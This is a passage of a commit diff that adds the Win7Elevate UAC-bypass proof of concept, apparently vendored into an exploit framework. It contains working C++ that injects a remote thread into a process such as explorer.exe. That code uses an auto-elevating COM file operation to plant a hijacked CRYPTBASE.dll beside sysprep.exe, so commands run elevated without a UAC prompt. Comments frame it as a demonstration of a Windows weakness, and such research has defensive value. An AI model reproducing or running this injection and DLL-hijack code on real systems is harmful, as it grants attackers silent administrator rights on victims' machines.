CLogger::LogLine(L"Couldn't load kernel32.dll");
return;
}
W7EUtils::GetProcAddr< BOOL (WINAPI *)(HMODULE) > tfpFreeLibrary( &GetProcAddress, hModKernel32, "FreeLibrary");
W7EUtils::GetProcAddr< HMODULE (WINAPI *)(LPCWSTR) > tfpLoadLibrary( &GetProcAddress, hModKernel32, "LoadLibraryW");
W7EUtils::GetProcAddr< FARPROC (WINAPI *)(HMODULE, LPCSTR) > tfpGetProcAddress( &GetProcAddress, hModKernel32, "GetProcAddress");
W7EUtils::GetProcAddr< BOOL (WINAPI *)(HANDLE) > tfpCloseHandle( &GetProcAddress, hModKernel32, "CloseHandle");
W7EUtils::GetProcAddr< DWORD (WINAPI *)(HANDLE,DWORD) > tfpWaitForSingleObject( &GetProcAddress, hModKernel32, "WaitForSingleObject");
if (0 == tfpFreeLibrary.f
|| 0 == tfpLoadLibrary.f
|| 0 == tfpGetProcAddress.f
|| 0 == tfpCloseHandle.f
|| 0 == tfpWaitForSingleObject.f)
{
//MessageBox(hWnd, L"Couldn't find API", L"Win7Elevate", MB_OK | MB_ICONWARNING);
CLogger::LogLine(L"Couldn't find API");
}
else
{
// Here we define the target process and DLL for "part 2." This is an auto/silent-elevating process which isn't
// directly below System32 and which loads a DLL which is directly below System32 but isn't on the OS's "Known DLLs" list.
// If we copy our own DLL with the same name to the exe's folder then the exe will load our DLL instead of the real one.
const wchar_t *szElevDir = L"C:\\Windows\\System32\\sysprep";
const wchar_t *szElevDll = L"CRYPTBASE.dll";
const wchar_t *szElevDllFull = L"C:\\Windows\\System32\\sysprep\\CRYPTBASE.dll";
const wchar_t *szElevExeFull = L"C:\\Windows\\System32\\sysprep\\sysprep.exe";
std::wstring strElevArgs = L"\"";
// strElevArgs += szElevExeFull;
// strElevArgs += L"\" \"";
strElevArgs += szCmd;
strElevArgs += L"\" \"";
strElevArgs += szDir;
strElevArgs += L"\" \"";
for (const wchar_t *pCmdArgChar = szArgs; *szArgs; ++szArgs)
{
if (*szArgs != L'\"')
{
strElevArgs += *szArgs;
}
else
{
strElevArgs += L"\"\"\""; // Turn each quote into three to preserve them in the arguments.
}
}
strElevArgs += L"\"";
if (!bInject)
{
// Test code without remoting.
// This should result in a UAC prompt, if UAC is on at all and we haven't been launched as admin.
// Satisfy CreateProcess's non-const args requirement
wchar_t *szElevArgsNonConst = new wchar_t[strElevArgs.length() + 1];
wcscpy_s(szElevArgsNonConst, strElevArgs.length() + 1, strElevArgs.c_str());
InjectArgs ia;
ia.fpFreeLibrary = tfpFreeLibrary.f;
ia.fpLoadLibrary = tfpLoadLibrary.f;
ia.fpGetProcAddress = tfpGetProcAddress.f;
ia.fpCloseHandle = tfpCloseHandle.f;
ia.fpWaitForSingleObject = tfpWaitForSingleObject.f;
ia.szSourceDll = szPathToOurDll;
ia.szElevDir = szElevDir;
ia.szElevDll = szElevDll;
ia.szElevDllFull = szElevDllFull;
ia.szElevExeFull = szElevExeFull;
ia.szElevArgs = szElevArgsNonConst;
ia.szShell32 = L"shell32.dll";
ia.szOle32 = L"ole32.dll";
ia.szCoInitialize = "CoInitialize";
ia.szCoUninitialize = "CoUninitialize";
ia.szCoGetObject = "CoGetObject";
ia.szCoCreateInstance = "CoCreateInstance";
ia.szSHCreateItemFPN = "SHCreateItemFromParsingName";
ia.szShellExecuteExW = "ShellExecuteExW";
ia.szEIFOMoniker = bElevate ? L"Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}" : NULL;
ia.pIID_EIFOClass = bElevate ? NULL : &__uuidof(FileOperation);
ia.pIID_EIFO = &__uuidof(IFileOperation);
ia.pIID_ShellItem2 = &__uuidof(IShellItem2);
ia.pIID_Unknown = &__uuidof(IUnknown);
RemoteCodeFunc(&ia);
delete[] szElevArgsNonConst;
}
else if (W7EUtils::OpenProcessToInject(hWnd, &hTargetProc, dwPid, szProcName))
{
// Test code with remoting.
// At least as of RC1 build 7100, with the default OS settings, this will run the specified command
// with elevation but without triggering a UAC prompt.
// Scope CRemoteMemory so it's destroyed before the process handle is closed.
{
W7EUtils::CRemoteMemory reme(hTargetProc);
InjectArgs ia;
// ASSUMPTION: Remote process has same ASLR setting as us (i.e. ASLR = on)
// kernel32.dll is mapped to the same address range in both processes.
ia.fpFreeLibrary = tfpFreeLibrary.f;
ia.fpLoadLibrary = tfpLoadLibrary.f;
ia.fpGetProcAddress = tfpGetProcAddress.f;
ia.fpCloseHandle = tfpCloseHandle.f;
ia.fpWaitForSingleObject = tfpWaitForSingleObject.f;
// It would be more efficient to allocate and copy the data in one
// block but since this is just a proof-of-concept I don't bother.
ia.szSourceDll = reme.AllocAndCopyMemory(szPathToOurDll);
ia.szElevDir = reme.AllocAndCopyMemory(szElevDir);
ia.szElevDll = reme.AllocAndCopyMemory(szElevDll);
ia.szElevDllFull = reme.AllocAndCopyMemory(szElevDllFull);
ia.szElevExeFull = reme.AllocAndCopyMemory(szElevExeFull);
ia.szElevArgs = reme.AllocAndCopyMemory(strElevArgs.c_str(), false); // Leave this page writeable for CreateProcess.
ia.szShell32 = reme.AllocAndCopyMemory(L"shell32.dll");
ia.szOle32 = reme.AllocAndCopyMemory(L"ole32.dll");
ia.szCoInitialize = reme.AllocAndCopyMemory("CoInitialize");
ia.szCoUninitialize = reme.AllocAndCopyMemory("CoUninitialize");
ia.szCoGetObject = reme.AllocAndCopyMemory("CoGetObject");
ia.szCoCreateInstance = reme.AllocAndCopyMemory("CoCreateInstance");
ia.szSHCreateItemFPN = reme.AllocAndCopyMemory("SHCreateItemFromParsingName");
ia.szShellExecuteExW = reme.AllocAndCopyMemory("ShellExecuteExW");
ia.szEIFOMoniker = bElevate ? reme.AllocAndCopyMemory(L"Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}") : NULL;
ia.pIID_EIFOClass = bElevate ? NULL : reinterpret_cast< const IID * >( reme.AllocAndCopyMemory(&__uuidof(FileOperation), sizeof(__uuidof(FileOperation)), false) );
ia.pIID_EIFO = reinterpret_cast< const IID * >( reme.AllocAndCopyMemory(&__uuidof(IFileOperation), sizeof(__uuidof(IFileOperation)), false) );
ia.pIID_ShellItem2 = reinterpret_cast< const IID * >( reme.AllocAndCopyMemory(&__uuidof(IShellItem2), sizeof(__uuidof(IShellItem2)), false) );
ia.pIID_Unknown = reinterpret_cast< const IID * >( reme.AllocAndCopyMemory(&__uuidof(IUnknown), sizeof(__uuidof(IUnknown)), false) );
void *pRemoteArgs = reme.AllocAndCopyMemory(&ia, sizeof(ia), false);
void *pRemoteFunc = reme.AllocAndCopyMemory( RemoteCodeFunc, codeEndAdr - codeStartAdr, true);
if (reme.AnyFailures())
{
//MessageBox(hWnd, L"Remote allocation failed", L"Win7Elevate", MB_OK | MB_ICONWARNING);
CLogger::LogLine(L"Remote allocation failed");
}
else
{
HANDLE hRemoteThread = CreateRemoteThread(hTargetProc, NULL, 0, reinterpret_cast< LPTHREAD_START_ROUTINE >( pRemoteFunc ), pRemoteArgs, 0, NULL);
if (hRemoteThread == 0)
{
//MessageBox(hWnd, L"Couldn't create remote thread", L"Win7Elevate", MB_OK | MB_ICONWARNING);
CLogger::LogLine(
CError::Format(
GetLastError(),
L"Couldn't create remote thread",
L"CreateRemoteThread"));
}
else
{
if ( Redirector )
Redirector();
while(true)
{
DWORD dwWaitRes = WaitForSingleObject(hRemoteThread, 10000);
if (dwWaitRes == WAIT_OBJECT_0)
{
bThreadWaitSuccess = true;
break;
}
else if (dwWaitRes != WAIT_TIMEOUT)
{
bThreadWaitFailure = true;
break;
}
//else if (IDCANCEL == MessageBox(hWnd, L"Continue waiting for remote thread to complete?", L"Win7Elevate", MB_OKCANCEL | MB_ICONQUESTION))
else
{
CLogger::LogLine(L"Continue waiting for remote thread to complete? : NO");
// See if it completed before the user asked to stop waiting.
// Code that wasn't just a proof-of-concept would use a worker thread that could cancel the wait UI.
if (WAIT_OBJECT_0 == WaitForSingleObject(hRemoteThread, 0))
{
bThreadWaitSuccess = true;
}
break;
}
}
if (!bThreadWaitSuccess)
{
// The memory in the other process could still be in use.
// Freeing it now will almost certainly crash the other process.
// Letting it leak is the lesser of two evils...
reme.LeakMemory();
}
}
}
}
CloseHandle(hTargetProc);
}
}
FreeLibrary(hModKernel32);
if (bThreadWaitFailure)
{
//MessageBox(hWnd, L"Error waiting on the remote thread to complete", L"Win7Elevate", MB_OK | MB_ICONWARNING);
CLogger::LogLine(L"Error waiting on the remote thread to complete");
}
else if (bThreadWaitSuccess)
{
//MessageBox(hWnd, L"Remote thread completed", L"Win7Elevate", MB_OK | MB_ICONINFORMATION);
CLogger::LogLine(L"Remote thread completed");
}
}

9
external/source/exploits/bypassuac/Win7Elevate/Win7Elevate_Inject.h vendored Normal file
View File

@ -0,0 +1,9 @@
#pragma once
namespace W7EInject
{
void AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD dwPid, const wchar_t *szProcName,
const wchar_t *szCmd, const wchar_t *szArgs, const wchar_t *szDir,
const wchar_t *szPathToOurDll,
DWORD (__stdcall *Redirector)(void));
}

347
external/source/exploits/bypassuac/Win7Elevate/Win7Elevate_Utils.cpp vendored Normal file
View File

@ -0,0 +1,347 @@
#include "stdafx.h"
#include "Win7Elevate_Utils.h"
#include ".\..\CMMN.h"
// All code (except for GetElevationType) (C) Leo Davidson, 8th February 2009, all rights reserved.
// (Minor tidy-up 12th June 2009 for the code's public release.)
// http://www.pretentiousname.com
// leo@ox.compsoc.net
//
// Using any part of this code for malicious purposes is expressly forbidden.
//
// This proof-of-concept code is intended only to demonstrate that code-injection
// poses a real problem with the default UAC settings in Windows 7 (tested with RC1 build 7100).
//
// Win7Elevate_Inject.cpp is the most interesting file. Most of the rest is just boilerplate UI/util code.
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
bool W7EUtils::GetProcessList(HWND hWnd, std::map< DWORD, std::wstring > &mapProcs)
{
// Note: We probably need to target a process which has the same ASLR setting as us, i.e. ON.
// Explorer.exe is our default since it has ASLR on, is always running and can do the COM silent-elevation stuff by default.
bool bResult = false;
mapProcs.clear();
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hSnapshot == INVALID_HANDLE_VALUE)
{
//MessageBox(hWnd, L"CreateToolhelp32Snapshot failed", L"Win7Elevate", MB_OK | MB_ICONWARNING);
CLogger::LogLine(L"CreateToolhelp32Snapshot failed");
}
else
{
bool bFirst = true;
PROCESSENTRY32 pe;
while(true)
{
ZeroMemory(&pe, sizeof(pe));
pe.dwSize = sizeof(pe);
BOOL bPR = FALSE;
if (bFirst)
{
bFirst = false;
bPR = Process32First(hSnapshot, &pe);
}
else
{
bPR = Process32Next(hSnapshot, &pe);
}
if (!bPR)
{
DWORD dwErr = GetLastError();
if (ERROR_NO_MORE_FILES != dwErr)
{
//MessageBox(hWnd, L"Process32Next/First failed", L"Win7Elevate", MB_OK | MB_ICONWARNING);
CLogger::LogLine(L"Process32Next/First failed");
}
else if (mapProcs.empty())
{
//MessageBox(hWnd, L"Process32Next/First returned nothing", L"Win7Elevate", MB_OK | MB_ICONWARNING);
CLogger::LogLine(L"Process32Next/First returned nothing");
}
else
{
bResult = true;
}
break; // Stop enumerating.
}
// Only insert processes that we can open
HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pe.th32ProcessID);
if (hProc != 0)
{
CloseHandle(hProc);
mapProcs.insert( std::make_pair( pe.th32ProcessID, pe.szExeFile ) );
}
}
CloseHandle(hSnapshot);
}
return bResult;
}
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
bool W7EUtils::OpenProcessToInject(HWND hWnd, HANDLE *pOutProcHandle, DWORD dwPid, const wchar_t *szProcName)
{
*pOutProcHandle = 0;
if (szProcName == NULL)
{
//MessageBox(hWnd, L"No process name passed in", L"Win7Elevate", MB_OK | MB_ICONWARNING);
CLogger::LogLine(L"No process name passed in");
return false;
}
*pOutProcHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
if (*pOutProcHandle == 0)
{
DWORD dwError = GetLastError();
wchar_t szPID[128];
_itow_s(dwPid, szPID, _countof(szPID), 10);
wchar_t szError[128];
_itow_s(dwError, szError, _countof(szError), 10);
std::wstring strMsg = L"Couldn't open process ";
strMsg += szProcName;
strMsg += L" (pid: ";
strMsg += szPID;
strMsg += L") ";
if (dwError == ERROR_ACCESS_DENIED)
{
strMsg += L"ERROR_ACCESS_DENIED\n(We probably tried to inject into an elevated process\nwhich isn't allowed unless we're also elevated.\nPick an unelevated process.)";
}
else
{
strMsg += L"error ";
strMsg += szError;
}
//MessageBox(hWnd, strMsg.c_str(), L"Win7Elevate", MB_OK | MB_ICONWARNING);
CLogger::LogLine(strMsg);
return false;
}
return true;
}
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
W7EUtils::CTempResource::CTempResource(HINSTANCE hInstance, int iResourceId)
: m_hInstance(hInstance)
, m_iResourceId(iResourceId)
{
}
// virtual
W7EUtils::CTempResource::~CTempResource()
{
if (!m_strFilePath.empty())
{
DeleteFile(m_strFilePath.c_str());
m_strFilePath.clear();
}
m_iResourceId = 0;
}
bool W7EUtils::CTempResource::GetFilePath(std::wstring &strPath)
{
if (m_strFilePath.empty())
{
wchar_t szTempPath[MAX_PATH];
DWORD dwTemp = GetTempPath(_countof(szTempPath), szTempPath);
if (dwTemp != 0 && dwTemp < _countof(szTempPath))
{
HRSRC hResource = FindResource(m_hInstance, MAKEINTRESOURCE(m_iResourceId), L"BINARY");
if (hResource)
{
HGLOBAL hLoadedResource = LoadResource(m_hInstance, hResource);
if (hLoadedResource)
{
LPVOID pLockedResource = LockResource(hLoadedResource);
if (pLockedResource)
{
DWORD dwResourceSize = SizeofResource(m_hInstance, hResource);
if (0 != dwResourceSize)
{
wchar_t szTempFilePath[MAX_PATH];
if (0 != GetTempFileName(szTempPath, L"w7e", 0, szTempFilePath))
{
HANDLE hFile = CreateFile(szTempFilePath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if (INVALID_HANDLE_VALUE != hFile)
{
DWORD dwBytesWritten = 0;
if (WriteFile(hFile, pLockedResource, dwResourceSize, &dwBytesWritten, NULL)
&& dwBytesWritten == dwResourceSize)
{
m_strFilePath = szTempFilePath;
}
CloseHandle(hFile);
if (m_strFilePath.empty())
{
DeleteFile(szTempFilePath);
}
}
}
}
}
}
}
}
}
if (!m_strFilePath.empty())
{
strPath = m_strFilePath;
return true;
}
strPath.clear();
return false;
}
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
W7EUtils::CRemoteMemory::CRemoteMemory(HANDLE hRemoteProcess)
: m_hRemoteProcess(hRemoteProcess)
, m_bAnyFailures(false)
{
}
// virtual
W7EUtils::CRemoteMemory::~CRemoteMemory()
{
while(!m_listRemoteAllocations.empty())
{
VirtualFreeEx(m_hRemoteProcess, m_listRemoteAllocations.back(), 0, MEM_RELEASE);
m_listRemoteAllocations.pop_back();
}
}
void W7EUtils::CRemoteMemory::LeakMemory()
{
m_listRemoteAllocations.clear();
}
bool W7EUtils::CRemoteMemory::AnyFailures() const
{
return m_bAnyFailures;
}
void *W7EUtils::CRemoteMemory::AllocAndCopyMemory(const void *pLocalBuffer, SIZE_T bufferSize, bool bExecutable, bool bConst)
{
void *pRemoteAllocation = VirtualAllocEx(m_hRemoteProcess, 0, bufferSize, MEM_COMMIT | PAGE_READWRITE, bExecutable ? PAGE_EXECUTE_READWRITE : PAGE_READWRITE);
if (pRemoteAllocation)
{
DWORD dwOldProtect = 0;
if (!WriteProcessMemory(m_hRemoteProcess, pRemoteAllocation, pLocalBuffer, bufferSize, NULL)
|| (!bExecutable && !bConst && !VirtualProtectEx(m_hRemoteProcess, pRemoteAllocation, bufferSize, bExecutable ? PAGE_EXECUTE_READ : PAGE_READONLY, &dwOldProtect)))
{
VirtualFreeEx(m_hRemoteProcess, pRemoteAllocation, 0, MEM_RELEASE);
pRemoteAllocation = 0;
}
else
{
m_listRemoteAllocations.push_back(pRemoteAllocation);
}
}
if (pRemoteAllocation == 0)
{
m_bAnyFailures = true;
}
return pRemoteAllocation;
}
wchar_t *W7EUtils::CRemoteMemory::AllocAndCopyMemory(const wchar_t *szLocalString, bool bConst)
{
return reinterpret_cast< wchar_t * >(
this->AllocAndCopyMemory(
reinterpret_cast< const void * >( szLocalString ),
(wcslen(szLocalString)+1) * sizeof(szLocalString[0]),
false, bConst ) );
}
char *W7EUtils::CRemoteMemory::AllocAndCopyMemory(const char *szLocalString, bool bConst)
{
return reinterpret_cast< char * >(
this->AllocAndCopyMemory(
reinterpret_cast< const void * >( szLocalString ),
(strlen(szLocalString)+1) * sizeof(szLocalString[0]),
false, bConst ) );
}
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// GetElevationType slightly modified from original by Andrei Belogortseff
// From http://stackoverflow.com/questions/95912/how-can-i-detect-if-my-process-is-running-uac-elevated-or-not
bool W7EUtils::GetElevationType(TOKEN_ELEVATION_TYPE * ptet)
{
bool bResult = false;
HANDLE hToken = NULL;
if (OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken))
{
DWORD dwReturnLength = 0;
if (GetTokenInformation(hToken, TokenElevationType, ptet, sizeof(*ptet), &dwReturnLength ))
{
assert(dwReturnLength == sizeof(*ptet));
bResult = true;
}
CloseHandle(hToken);
}
return bResult;
}
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

54
external/source/exploits/bypassuac/Win7Elevate/Win7Elevate_Utils.h vendored Normal file
View File

@ -0,0 +1,54 @@
#pragma once
namespace W7EUtils
{
bool GetProcessList(HWND hWnd, std::map< DWORD, std::wstring > &mapProcs);
bool OpenProcessToInject(HWND hWnd, HANDLE *pOutProcHandle, DWORD dwPid, const wchar_t *szProcName);
bool GetElevationType(TOKEN_ELEVATION_TYPE * ptet);
template < typename T > class GetProcAddr
{
public:
T f;
__forceinline GetProcAddr(FARPROC (WINAPI *fpGetProcAddress)(HMODULE hModule, LPCSTR lpProcName), HMODULE hModule, const char *lpProcName)
{
f = reinterpret_cast< T >(fpGetProcAddress(hModule, lpProcName));
}
};
class CTempResource
{
private:
HINSTANCE m_hInstance;
int m_iResourceId;
std::wstring m_strFilePath;
public:
CTempResource(HINSTANCE hInstance, int iResourceId);
virtual ~CTempResource();
bool GetFilePath(std::wstring &strPath);
};
class CRemoteMemory
{
private:
HANDLE m_hRemoteProcess;
std::list< void * > m_listRemoteAllocations;
bool m_bAnyFailures;
private:
CRemoteMemory(const CRemoteMemory &rhs); // Disallow.
CRemoteMemory &operator=(const CRemoteMemory &rhs); // Disallow.
public:
CRemoteMemory(HANDLE hRemoteProcess);
virtual ~CRemoteMemory();
void LeakMemory();
bool AnyFailures() const;
void *AllocAndCopyMemory(const void *pLocalBuffer, SIZE_T bufferSize, bool bExecutable, bool bConst = true);
wchar_t *AllocAndCopyMemory(const wchar_t *szLocalString, bool bConst = true);
char *AllocAndCopyMemory(const char *szLocalString, bool bConst = true);
};
}

8
external/source/exploits/bypassuac/Win7Elevate/stdafx.cpp vendored Normal file
View File

@ -0,0 +1,8 @@
// stdafx.cpp : source file that includes just the standard includes
// Win7Elevate.pch will be the pre-compiled header
// stdafx.obj will contain the pre-compiled type information
#include "stdafx.h"
// TODO: reference any additional headers you need in STDAFX.H
// and not in this file

44
external/source/exploits/bypassuac/Win7Elevate/stdafx.h vendored Normal file
View File

@ -0,0 +1,44 @@
// stdafx.h : include file for standard system include files,
// or project specific include files that are used frequently, but
// are changed infrequently
//
#pragma once
#include "targetver.h"
#if defined _M_IX86
#pragma comment(linker,"/manifestdependency:\"type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='x86' publicKeyToken='6595b64144ccf1df' language='*'\"")
#elif defined _M_X64
#pragma comment(linker,"/manifestdependency:\"type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='amd64' publicKeyToken='6595b64144ccf1df' language='*'\"")
#endif
#include <windows.h>
#include <commctrl.h>
#include <shlobj.h>
#include <Tlhelp32.h>
#include <stdlib.h>
#include <tchar.h>
#include <assert.h>
#include <string>
#include <list>
#include <map>
#ifndef FOFX_REQUIREELEVATION
#define FOFX_REQUIREELEVATION (0x10000000)
#endif
#ifndef FOFX_DONTDISPLAYLOCATIONS
#define FOFX_DONTDISPLAYLOCATIONS (0x80000000)
#endif

8
external/source/exploits/bypassuac/Win7Elevate/targetver.h vendored Normal file
View File

@ -0,0 +1,8 @@
#pragma once
// Including SDKDDKVer.h defines the highest available Windows platform.
// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
#include <SDKDDKVer.h>

6
external/source/exploits/bypassuac/Win7ElevateDll/Win7ElevateDll.cpp vendored Normal file
View File

@ -0,0 +1,6 @@
// Win7ElevateDll.cpp : Defines the exported functions for the DLL application.
//
#include "stdafx.h"

179
external/source/exploits/bypassuac/Win7ElevateDll/Win7ElevateDll.vcxproj vendored Normal file
View File

@ -0,0 +1,179 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{A1814C92-4DA6-440C-811E-86016AB7433A}</ProjectGuid>
<Keyword>Win32Proj</Keyword>
<RootNamespace>Win7ElevateDll</RootNamespace>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
<TargetName>$(ProjectName)32</TargetName>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
<TargetName>$(ProjectName)64</TargetName>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
<TargetName>$(ProjectName)32</TargetName>
<GenerateManifest>false</GenerateManifest>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
<TargetName>$(ProjectName)64</TargetName>
<GenerateManifest>false</GenerateManifest>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;WIN7ELEVATEDLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;WIN7ELEVATEDLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<PrecompiledHeader>Use</PrecompiledHeader>
<Optimization>MinSpace</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN7ELEVATEDLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<GenerateDebugInformation>false</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<PrecompiledHeader>Use</PrecompiledHeader>
<Optimization>MinSpace</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN64;_WIN64;NDEBUG;_WINDOWS;_USRDLL;WIN7ELEVATEDLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<GenerateDebugInformation>false</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
<BuildLog>
<Path>
</Path>
</BuildLog>
</ItemDefinitionGroup>
<ItemGroup>
<ClInclude Include="stdafx.h" />
<ClInclude Include="targetver.h" />
</ItemGroup>
<ItemGroup>
<ClCompile Include="..\CMMN.cpp" />
<ClCompile Include="dllmain.cpp">
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</CompileAsManaged>
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</CompileAsManaged>
